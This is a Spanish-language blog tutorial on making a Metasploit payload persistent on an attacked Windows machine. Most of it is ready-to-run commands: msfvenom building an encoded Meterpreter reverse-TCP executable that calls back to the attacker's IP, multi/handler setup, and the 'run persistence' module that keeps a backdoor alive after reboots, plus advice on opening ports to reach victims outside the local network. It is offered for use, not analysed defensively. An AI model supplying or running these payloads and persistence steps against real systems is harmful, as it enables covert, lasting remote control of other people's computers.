Advertisement

header ads

HACER PERSISTENTE A TU EXPLOIT AL ATACAR UN WINDOWS

El otro día una persona en instagram me escribía sobre hacer un persistente a tu propio exploit o con el exploit creador con msfvemon.



Pero avece la gente pregunta cosas donde no voy a responder y no se toman el tiempo de entrar a IRC #creadpag a preguntar. Pero bueno sigamos el tutorial.
Como tenemos mucha cantidad de contenido sobre acceso a un windows te pasaré el contenido aqui para ahorrarme todos los métodos de ataque a un windows desde xp  a windows 10. Pincha aquí.
Vamos a crear uno básico con msfvemon para mostrarte el procedimiento del persistente.
Vemos la lista
msfvenom -l
Le agregamos -p al colocar el payload de la lista -f el tipo de archivo -e el modo de encodear -i el tiempo de encodear -o el archivo creado. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=6666 -f exe -e x86/shikata_ga_nai -i 9 -o creadpag.exe
Ahora solo abrimos msfconsole
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.1.
Recuerda LHOST siempre será la IP de tu maquina
set LPORT 6666
exploit
Al ejecutar el archivos exe tenemos acceso a meterpreter ahora vamos a crear la persistencia.
Ayuda!
run persistence -h
run persistence -U -i 5 -p 666 -r 192.168.1.8
Te explico -U es la parte del usuario atacado con -X seria todo los usuario del sistema. -i el tiempo de espera -p el puerto -r la IP de tu maquina local.
Ahora reinicias tu maquina y inicias la persistencia.
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.8
set LPORT 666
exploit
Y iniciará cuando tu quieras, obviamente cuando quieres acceder fuera de la red, las dos maquinas tienen que tener los puertos abiertos que vos le indicaste, en caso de encontrar un sistema con alguna vulnerabilidad no podas hacer un persistente porque ya tienes acceso desde la vulnerabilidad.

Publicar un comentario

0 Comentarios